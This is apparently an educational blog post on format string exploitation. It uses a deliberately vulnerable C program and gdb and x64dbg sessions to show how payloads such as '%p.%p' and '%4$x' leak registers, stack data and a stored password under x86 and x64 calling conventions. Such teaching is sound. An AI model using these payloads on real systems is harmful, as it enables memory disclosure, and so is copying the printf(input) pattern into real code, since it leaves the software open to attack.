Impact of x64 calling convention in format string exploitation

In this post I give a brief overview of how format string exploitation differs on 64-bit architectures because of their different calling conventions.


Format string vulnerabilities have been known for ages, yet they can still be found in software and packages today. Exploiting one is often straightforward, and the impact ranges from denial of service to remote code execution. On 64-bit systems format string exploitation still works, but the basics change a little because of the 64-bit calling conventions. In this post, I will take you through a few small changes you will notice when you try to exploit a format string bug on a 64-bit architecture.

Basics of Format String Attack - x86 (32-bit)

I will not go into much detail on format strings, as I expect you have come across format string vulnerabilities at least a few times before. If not, then as an exercise, let's look at a simple example.

Assume the following sample code is running on a remote machine, with the variable password set to some value we do not know:

#include <stdio.h>
#include <string.h>
int main(){
    char input[100];
    char password[10] = "hello";
 
    printf ("\nEnter your password: ");
    scanf("%100s", input);
    printf("\n Your string is :");
    printf(input);    /* vulnerable: user input is used as the format string */
    if (strncmp(password, input, 5) == 0){
        printf("\nYour password is correct\n");
    }
    else {
        printf("\n Password doesn't match\n");
    }
    return 0;
}

Let's compile this locally to play with the program.

$gcc sample1.c -g -o sample1.out

[Screenshot: running the compiled program]

The code above takes user input and compares it with a stored string ("hello"). If the input matches, it prints "Your password is correct".

As mentioned above, if the code is running on a remote server with an unknown value in password, it is not easy to get the success message without guessing. As an attacker, you could try to cause an overflow by entering more than 100 characters, but scanf's %100s field width limits the input to 100 characters. (Strictly speaking, the terminating NUL can still land one byte past the 100-byte buffer, but that is not the bug we are after here.)

As you can guess (this post is about nothing else), the code is vulnerable to a format string attack, because the user input is passed directly to printf as the format string in printf(input). Let's see how we can verify and exploit that.
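For contrast, here is a minimal sketch of the safe pattern. The helper name echo_safely is made up for this illustration and is not part of the sample program. The untrusted text is passed as an argument to a constant "%s" format, so any % sequences in it are copied and never interpreted.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper (not from the sample program): formats untrusted
 * text into out. The input is only ever an argument to the constant "%s"
 * format, so "%x" and friends inside it are treated as plain characters.
 * Returns what snprintf returns: the length the full output needs. */
int echo_safely(char *out, size_t out_len, const char *user_input)
{
    return snprintf(out, out_len, "%s", user_input);
}
```

Calling echo_safely(buf, sizeof buf, "test%x.%x") leaves the text in buf exactly as typed. GCC can also point out calls like printf(input) at compile time when the -Wformat-security warning is enabled.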

Let's check what happens when the input contains format specifiers.

The literal text "test" is printed as is, but each %x is replaced with something that looks like a memory address. We have to look at the program in a debugger to dig deeper.

gdb shows the following disassembly of the program.

(gdb) disas main
Dump of assembler code for function main:
   0x000011c9 <+0>:     lea    0x4(%esp),%ecx
   0x000011cd <+4>:     and    $0xfffffff0,%esp
   0x000011d0 <+7>:     pushl  -0x4(%ecx)
   0x000011d3 <+10>:    push   %ebp
   0x000011d4 <+11>:    mov    %esp,%ebp
   0x000011d6 <+13>:    push   %ebx
   0x000011d7 <+14>:    push   %ecx
   0x000011d8 <+15>:    sub    $0x70,%esp
   0x000011db <+18>:    call   0x10d0 <__x86.get_pc_thunk.bx>
   0x000011e0 <+23>:    add    $0x2e20,%ebx
   0x000011e6 <+29>:    movl   $0x6c6c6568,-0x76(%ebp)
   0x000011ed <+36>:    movl   $0x6f,-0x72(%ebp)
   0x000011f4 <+43>:    movw   $0x0,-0x6e(%ebp)
   0x000011fa <+49>:    sub    $0xc,%esp
   0x000011fd <+52>:    lea    -0x1ff8(%ebx),%eax
   0x00001203 <+58>:    push   %eax
   0x00001204 <+59>:    call   0x1040 <printf@plt>
   0x00001209 <+64>:    add    $0x10,%esp
   0x0000120c <+67>:    sub    $0x8,%esp
   0x0000120f <+70>:    lea    -0x6c(%ebp),%eax
   0x00001212 <+73>:    push   %eax
   0x00001213 <+74>:    lea    -0x1fe1(%ebx),%eax
   0x00001219 <+80>:    push   %eax
   0x0000121a <+81>:    call   0x1070 <__isoc99_scanf@plt>
   0x0000121f <+86>:    add    $0x10,%esp
   0x00001222 <+89>:    sub    $0xc,%esp
   0x00001225 <+92>:    lea    -0x1fdb(%ebx),%eax
   0x0000122b <+98>:    push   %eax
   0x0000122c <+99>:    call   0x1040 <printf@plt>
   0x00001231 <+104>:   add    $0x10,%esp
   0x00001234 <+107>:   sub    $0xc,%esp
   0x00001237 <+110>:   lea    -0x6c(%ebp),%eax
   0x0000123a <+113>:   push   %eax
   0x0000123b <+114>:   call   0x1040 <printf@plt>
   0x00001240 <+119>:   add    $0x10,%esp
   0x00001243 <+122>:   sub    $0x4,%esp
   0x00001246 <+125>:   push   $0x5
   0x00001248 <+127>:   lea    -0x6c(%ebp),%eax
   0x0000124b <+130>:   push   %eax
   0x0000124c <+131>:   lea    -0x76(%ebp),%eax
   0x0000124f <+134>:   push   %eax
   0x00001250 <+135>:   call   0x1030 <strcmp@plt>
   0x00001255 <+140>:   add    $0x10,%esp
   0x00001258 <+143>:   test   %eax,%eax
   0x0000125a <+145>:   jne    0x1270 <main+167>
   0x0000125c <+147>:   sub    $0xc,%esp
   0x0000125f <+150>:   lea    -0x1fc8(%ebx),%eax
   0x00001265 <+156>:   push   %eax
   0x00001266 <+157>:   call   0x1050 <puts@plt>
   0x0000126b <+162>:   add    $0x10,%esp
   0x0000126e <+165>:   jmp    0x1282 <main+185>
   0x00001270 <+167>:   sub    $0xc,%esp
   0x00001273 <+170>:   lea    -0x1fae(%ebx),%eax
   0x00001279 <+176>:   push   %eax
   0x0000127a <+177>:   call   0x1050 <puts@plt>

The third printf (at main+114) is the one that prints the user input. So let's put a breakpoint on it and run the program.

(gdb) b *main+114
Breakpoint 1 at 0x123b: file sample1.c, line 10.
(gdb) r 
Starting program: /root/format_string/sample1.out 

Enter your password: %x.%x.%x


Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb)

Examine the top 10 words of the stack and then continue the program.

(gdb) x/10x $esp
0xbffffb50:     0xbffffb6c      0xbffffb6c      0xb7fff950      0x004011e0
0xbffffb60:     0x6568004d      0x006f6c6c      0x00000000      0x252e7825
0xbffffb70:     0x78252e78      0x00000000
(gdb) c
Continuing.
 Your string is :bffffb6c.b7fff950.4011e0
 Password doesn't match
[Inferior 1 (process 919) exited normally]
(gdb) 

We can see that the printed string contains the three stack words that follow the top entry at esp. This happens because printf parses the input string, finds three %x conversions, and assumes three matching arguments were passed. On 32-bit x86, arguments are passed to a function by pushing them on the stack, so printf reads four consecutive stack entries (the first is the pointer to the format string itself, the other three are taken as the arguments) and prints those three to stdout.
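To make this more concrete, below is a toy formatter that understands only %x. It is an illustration written for this post, not how glibc implements printf, and the name toy_format is made up. The point it shows is that the callee decides how many arguments to fetch purely from the format string, because nothing else tells it how many were really passed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stddef.h>

/* Toy formatter (illustrative only): supports just "%x". Every "%x" makes
 * it fetch one more unsigned int with va_arg. If the format asked for more
 * values than the caller supplied, va_arg would simply keep reading
 * whatever comes next, which is exactly the leak described above. */
size_t toy_format(char *out, size_t out_len, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0;

    if (out_len == 0)
        return 0;

    va_start(ap, fmt);
    while (*fmt != '\0' && used + 1 < out_len) {
        if (fmt[0] == '%' && fmt[1] == 'x') {
            unsigned int value = va_arg(ap, unsigned int); /* next slot */
            int n = snprintf(out + used, out_len - used, "%x", value);
            if (n < 0 || (size_t)n >= out_len - used)
                break;              /* no room left, stop early */
            used += (size_t)n;
            fmt += 2;
        } else {
            out[used++] = *fmt++;   /* ordinary character, copy as is */
        }
    }
    va_end(ap);
    out[used] = '\0';
    return used;
}
```

Called correctly, as in toy_format(buf, sizeof buf, "%x.%x.%x", 0xbffffb6cu, 0xb7fff950u, 0x4011e0u), it reproduces the string from the session above. The vulnerable program makes the equivalent call with no arguments at all after the format string.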

From the above, we have learned how to read stack data. Using the same technique we can retrieve the value saved in the password variable. Since password is a local variable, its memory is allocated on the stack. The instructions at main+29 and main+36 store the bytes of "hello" (followed by a NUL) on the stack. Let's put a breakpoint right after them, at main+43, and check that address.

(gdb) b *main+43
Breakpoint 2 at 0x4011f4: file sample1.c, line 5.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/format_string/sample1.out 

Breakpoint 2, 0x004011f4 in main () at sample1.c:5
5           char password[10] = "hello";
(gdb) x/x $ebp-0x76
0xbffffb62:     0x6c6c6568
(gdb)

So our string is at address 0xbffffb62. Now continue to the breakpoint at main+114.

(gdb) c
Continuing.

Enter your password: %x.%x.%x


Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $esp
0xbffffb50:     0xbffffb6c      0xbffffb6c      0xb7fff950      0x004011e0
0xbffffb60:     0x6568004d      0x006f6c6c      0x00000000      0x252e7825
0xbffffb70:     0x78252e78      0x00000000      0xb7fff000      0x00000000
0xbffffb80:     0x00000000      0xbffffc84      0xb7fb6000      0x00000000
0xbffffb90:     0x00000000      0xb7fb6000      0xb7e0dcb9      0xb7fb9588

The first %x reads the word at 0xbffffb54, so the 4th and 5th %x should return the words that hold the password string (0xbffffb60 and 0xbffffb64). We can use the positional form %N$x to fetch the Nth argument directly.
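The index arithmetic behind this can be sketched as a small helper. The function name x86_arg_index is made up, and it assumes esp is the value seen at the breakpoint on the call, where esp+0 holds the format string pointer and every argument slot is 4 bytes wide.

```c
#include <stdint.h>

/* Which printf argument index reads a given stack address on 32-bit x86?
 * Assumes addr >= esp + 4 and that esp is taken at the call instruction,
 * so esp+0 is the format string pointer and esp+4 is argument 1.
 * Returns the 1-based index N for %N$x; *byte_off receives the offset of
 * addr inside that 4-byte word. */
unsigned int x86_arg_index(uint32_t esp, uint32_t addr, unsigned int *byte_off)
{
    uint32_t delta = addr - esp;

    *byte_off = delta % 4u;
    return delta / 4u;
}
```

With esp = 0xbffffb50 and the password at 0xbffffb62 this gives index 4 with a byte offset of 2, i.e. the string starts in the upper half of the 4th word and continues in the 5th.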

(gdb) r
Starting program: /root/format_string/sample1.out 

Enter your password: %4$x.%5$x

Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb) c
Continuing.
 Your string is :6568004d.6f6c6c
 Password doesn't match
[Inferior 1 (process 1074) exited normally]
(gdb) 

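Ignoring the two unrelated low bytes (0x004d) of the first word, the leaked bytes form 0x6f6c6c6568, which is "hello" in ASCII when read in little-endian order.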
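If you prefer to let code do the byte shuffling, here is a small sketch. The name decode_leak and its parameters are invented for this example. It walks the leaked 32-bit words in memory order (lowest byte first, since x86 is little-endian), skips a given number of leading bytes and stops at the first NUL.

```c
#include <stdint.h>
#include <stddef.h>

/* Copies the bytes of little-endian 32-bit words, in memory order, into
 * out, starting skip bytes into the first word and stopping at the first
 * NUL byte. Returns the number of characters written. */
size_t decode_leak(const uint32_t *words, size_t count, size_t skip,
                   char *out, size_t out_len)
{
    size_t written = 0;

    if (out_len == 0)
        return 0;

    for (size_t i = skip; i < count * 4 && written + 1 < out_len; i++) {
        /* Memory byte i lives in word i / 4, shifted by (i % 4) * 8 bits. */
        char c = (char)((words[i / 4] >> ((i % 4) * 8)) & 0xffu);
        if (c == '\0')
            break;
        out[written++] = c;
    }
    out[written] = '\0';
    return written;
}
```

Feeding it the two leaked words 0x6568004d and 0x006f6c6c with skip set to 2 yields "hello".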

Note: If the local variable password were a string pointer rather than a char array, we would have to use %s on that slot (for example %4$s) so that printf treats the value as a pointer to a string.
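The difference between %x and %s, together with the positional N$ syntax, can be seen in a well-formed call. This is only a sketch: show_positional is a made-up name, and positional conversions are a POSIX extension (supported by glibc) rather than part of ISO C.

```c
#include <stdio.h>
#include <stddef.h>

/* Argument 1 is an integer, argument 2 is a pointer to a string.
 * "%1$x" prints the raw value of argument 1, while "%2$s" follows the
 * pointer in argument 2 and prints the string it points to. */
int show_positional(char *out, size_t out_len)
{
    return snprintf(out, out_len, "%2$s:%1$x", 0x2au, "hello");
}
```

Here both arguments really exist and both are referenced. In the attack, the same syntax is used to pick stack slots that were never passed as arguments in the first place.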

So, we have found a way to retrieve saved local variable data using a format string vulnerability. We will stop the intro here, as our goal was just to get a basic idea of format string exploitation, but there is much more to it, such as changing stack data using %n, GOT overwrites, etc.

Format String in x64 Linux

At first, you may think that format string exploitation should be almost the same on 64-bit, apart from the size of each entry, i.e. we would retrieve 8 bytes at a time rather than 4. But there is more to it than that.

Let's compile the same code on a 64-bit machine and pass format specifiers in the user input as we did previously. This time we will pass %p instead of %x, since %x prints only a 4-byte value but we need 8 bytes on a 64-bit architecture.
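A quick sketch of why %x is not enough on 64-bit. The function format_both is a made-up name, and the cast to unsigned int stands in for what printf does when it fetches a %x argument from an 8-byte slot on x86-64 Linux.

```c
#include <stdio.h>
#include <stddef.h>

/* %x consumes an unsigned int (32 bits on x86 and x86-64 Linux), so only
 * the low half of a 64-bit value survives. %llx prints all 64 bits. */
void format_both(unsigned long long value,
                 char *as_x, size_t x_len, char *as_llx, size_t llx_len)
{
    snprintf(as_x, x_len, "%x", (unsigned int)value);   /* low 32 bits */
    snprintf(as_llx, llx_len, "%llx", value);           /* all 64 bits */
}
```

For the value 0x6568000000000000, the %x form prints just 0 while the 64-bit form prints 6568000000000000. In other words, a %x leak of that slot would hide the interesting upper bytes completely, which is why %p (or %lx) is the better choice here.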

We get pointer-sized values in the output, as expected. The 2nd and 3rd values are (nil) because %p prints 0x0 as (nil). Let's now confirm where these values come from and try to retrieve the password string from the stack.

In gdb we get the following disassembly.

(gdb) disas main
Dump of assembler code for function main:
   0x0000000000001179 <+0>:     push   %rbp
   0x000000000000117a <+1>:     mov    %rsp,%rbp
   0x000000000000117d <+4>:     add    $0xffffffffffffff80,%rsp
   0x0000000000001181 <+8>:     mov    %fs:0x28,%rax
   0x000000000000118a <+17>:    mov    %rax,-0x8(%rbp)
   0x000000000000118e <+21>:    xor    %eax,%eax
   0x0000000000001190 <+23>:    movabs $0x6f6c6c6568,%rax
   0x000000000000119a <+33>:    mov    %rax,-0x7a(%rbp)
   0x000000000000119e <+37>:    movw   $0x0,-0x72(%rbp)
   0x00000000000011a4 <+43>:    lea    0xe59(%rip),%rdi        # 0x2004
   0x00000000000011ab <+50>:    mov    $0x0,%eax
   0x00000000000011b0 <+55>:    callq  0x1050 <printf@plt>
   0x00000000000011b5 <+60>:    lea    -0x70(%rbp),%rax
   0x00000000000011b9 <+64>:    mov    %rax,%rsi
   0x00000000000011bc <+67>:    lea    0xe58(%rip),%rdi        # 0x201b
   0x00000000000011c3 <+74>:    mov    $0x0,%eax
   0x00000000000011c8 <+79>:    callq  0x1070 <__isoc99_scanf@plt>
   0x00000000000011cd <+84>:    lea    0xe4d(%rip),%rdi        # 0x2021
   0x00000000000011d4 <+91>:    mov    $0x0,%eax
   0x00000000000011d9 <+96>:    callq  0x1050 <printf@plt>
   0x00000000000011de <+101>:   lea    -0x70(%rbp),%rax
   0x00000000000011e2 <+105>:   mov    %rax,%rdi
   0x00000000000011e5 <+108>:   mov    $0x0,%eax
   0x00000000000011ea <+113>:   callq  0x1050 <printf@plt>
   0x00000000000011ef <+118>:   lea    -0x70(%rbp),%rcx
   0x00000000000011f3 <+122>:   lea    -0x7a(%rbp),%rax
   0x00000000000011f7 <+126>:   mov    $0x5,%edx
   0x00000000000011fc <+131>:   mov    %rcx,%rsi
   0x00000000000011ff <+134>:   mov    %rax,%rdi
   0x0000000000001202 <+137>:   callq  0x1060 <strcmp@plt>
   0x0000000000001207 <+142>:   test   %eax,%eax
   0x0000000000001209 <+144>:   jne    0x1219 <main+160>
   0x000000000000120b <+146>:   lea    0xe22(%rip),%rdi        # 0x2034
   0x0000000000001212 <+153>:   callq  0x1030 <puts@plt>
   0x0000000000001217 <+158>:   jmp    0x1225 <main+172>
   0x0000000000001219 <+160>:   lea    0xe2e(%rip),%rdi        # 0x204e
   0x0000000000001220 <+167>:   callq  0x1030 <puts@plt>
   0x0000000000001225 <+172>:   mov    $0x0,%eax
   0x000000000000122a <+177>:   mov    -0x8(%rbp),%rdx
   0x000000000000122e <+181>:   sub    %fs:0x28,%rdx
   0x0000000000001237 <+190>:   je     0x123e <main+197>
   0x0000000000001239 <+192>:   callq  0x1040 <__stack_chk_fail@plt>
   0x000000000000123e <+197>:   leaveq 
   0x000000000000123f <+198>:   retq   
End of assembler dump.

Like earlier, put a breakpoint on the 3rd printf (main+113) and run the program. Next, examine the first 20 words at rsp and continue execution.

(gdb) b *main+113
Breakpoint 1 at 0x11ea: file sample1.c, line 10.
(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $rsp
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x00000000      0x00000000
0x7fffffffdc90: 0x00f0b5ff      0x00000000      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil)
 Password doesn't match
[Inferior 1 (process 6580) exited normally]

This may look strange, since the values in the printed string do not match the ones we saw on the stack.

Let's run the program again, but this time also check the register values.

(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $rsp    
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x2e70252e      0x00007025
0x7fffffffdc90: 0x00f0b5ff      0x00000000      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x0                 0
rdx            0x0                 0
rsi            0x3a                58
rdi            0x7fffffffdc80      140737488346240
rbp            0x7fffffffdcf0      0x7fffffffdcf0
rsp            0x7fffffffdc70      0x7fffffffdc70
r8             0x0                 0
r9             0xffffffffffffff88  -120
r10            0x555555556021      93824992239649
r11            0x246               582
r12            0x555555555080      93824992235648
r13            0x0                 0
r14            0x0                 0
r15            0x0                 0
rip            0x5555555551ea      0x5555555551ea <main+113>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil).(nil).0xffffffffffffff88
 Password doesn't match
[Inferior 1 (process 6973) exited normally]

Again the returned values are definitely not from the stack, but you can see 0x3a and 0xffffffffffffff88 in the registers (rsi and r9) just before the printf call. So, what's going on here?

Calling convention Rule 1: On 64-bit architectures, the first few integer or pointer parameters of a function are passed in registers rather than pushed on the stack; only the remaining ones go on the stack. The order in which parameters are assigned, from left to right, on Linux and Windows is:

Linux: RDI, RSI, RDX, RCX, R8, R9, remaining on the stack

Windows: RCX, RDX, R8, R9, remaining on the stack

Coming back to our program: when we pass five %p conversions, what we retrieve are register values, because printf assumes its arguments were passed in registers. Since RDI holds the format string itself, we only see the values of RSI, RDX, RCX, R8 and R9.

Now, when we pass more than five conversions, we start to see values from the stack.

(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p.%p.%p.%p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x0                 0
rdx            0x0                 0
rsi            0x3a                58
rdi            0x7fffffffdc80      140737488346240
rbp            0x7fffffffdcf0      0x7fffffffdcf0
rsp            0x7fffffffdc70      0x7fffffffdc70
r8             0x0                 0
r9             0xffffffffffffff88  -120
r10            0x555555556021      93824992239649
r11            0x246               582
r12            0x555555555080      93824992235648
r13            0x0                 0
r14            0x0                 0
r15            0x0                 0
rip            0x5555555551ea      0x5555555551ea <main+113>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/20x $rsp
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x2e70252e      0x252e7025
0x7fffffffdc90: 0x70252e70      0x0070252e      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil).(nil).0xffffffffffffff88.0x6568000000000000.0x6f6c6c.0x70252e70252e7025
 Password doesn't match
[Inferior 1 (process 2786) exited normally]

As you can see above, after the first five values we start to get 8-byte values from the stack. Conveniently, the password sits right at the top of the stack, so it is among the first stack values leaked (the 6th and 7th).
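The mapping we just observed can be written down as a small lookup. This is a sketch under stated assumptions: sysv_arg_source is a made-up helper, it covers only integer and pointer conversions such as %p, and the rsp it refers to is the value seen at a breakpoint on the call instruction (as in the gdb sessions above).

```c
#include <stdio.h>
#include <stddef.h>

/* Where does the Nth conversion (1-based) of a leaked format string read
 * from on x86-64 Linux? rdi holds the format string itself, so conversions
 * 1..5 come from rsi, rdx, rcx, r8 and r9. Later ones come from the stack,
 * 8 bytes each, starting at rsp. Returns -1 for the invalid index 0,
 * otherwise the snprintf result. */
int sysv_arg_source(unsigned int n, char *out, size_t out_len)
{
    static const char *const regs[] = { "rsi", "rdx", "rcx", "r8", "r9" };

    if (n == 0)
        return -1;                          /* indices are 1-based */
    if (n <= 5)
        return snprintf(out, out_len, "%s", regs[n - 1]);
    return snprintf(out, out_len, "rsp+%u", (n - 6) * 8u);
}
```

For n = 6 it reports rsp+0 and for n = 8 it reports rsp+16, which matches the run above: the 8th value printed was the start of our own input at 0x7fffffffdc80.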

Format String in x64 Windows

Finally, let's check format strings on a Windows system. Compile the same program in Visual Studio and execute it.

[Screenshot: format string exploitation in Windows]

We are getting some addresses, as expected. But let's verify that in a debugger.

Open the program in x64dbg and put a breakpoint on the 3rd printf. Run the program with six %p conversions.

Execution will break at the 3rd printf call. Note the registers and the stack at that point.

Now, continue the execution to check the string returned by the program.

You will notice that the first three values come from RDX, R8 and R9 as expected, since the parameter passing sequence on Windows is RCX, RDX, R8, R9 and then the stack. But the next three values come from the stack only after skipping the first four entries (32 bytes) at the top of the stack.

Calling convention Rule 2: On 64-bit Windows, even though the first 4 parameters are passed in registers, the caller still reserves stack space for them so that the callee can save the register values there if it needs to. This 32-byte area is called home space or shadow space.

Hence, in the above case the first 32 bytes from rsp do not show up in our string, since that is the reserved home space. Keeping that in mind, you can craft your format string so that it reaches the saved password.
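The same kind of lookup for 64-bit Windows looks like this. Again, it is only a sketch: win64_arg_source is a made-up helper, it handles integer and pointer conversions only, and rsp means the value at the breakpoint on the printf call.

```c
#include <stdio.h>
#include <stddef.h>

/* Where does the Nth conversion (1-based) read from on 64-bit Windows?
 * rcx holds the format string, so conversions 1..3 come from rdx, r8 and
 * r9. Stack values start only after the 32-byte home space, so conversion
 * 4 reads rsp+32. Returns -1 for the invalid index 0, otherwise the
 * snprintf result. */
int win64_arg_source(unsigned int n, char *out, size_t out_len)
{
    static const char *const regs[] = { "rdx", "r8", "r9" };

    if (n == 0)
        return -1;                          /* indices are 1-based */
    if (n <= 3)
        return snprintf(out, out_len, "%s", regs[n - 1]);
    return snprintf(out, out_len, "rsp+%u", 32u + (n - 4) * 8u);
}
```

So with six %p conversions the last three read rsp+32, rsp+40 and rsp+48. To reach a local variable, count its distance from rsp, subtract the 32 bytes of home space, divide by 8 and add 4.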

So, we have seen two small differences that the 64-bit calling conventions cause and that can affect your format string exploitation. I will end the post here, but I encourage you to do more research on format string exploitation, since there are many more ways to use a format string vulnerability.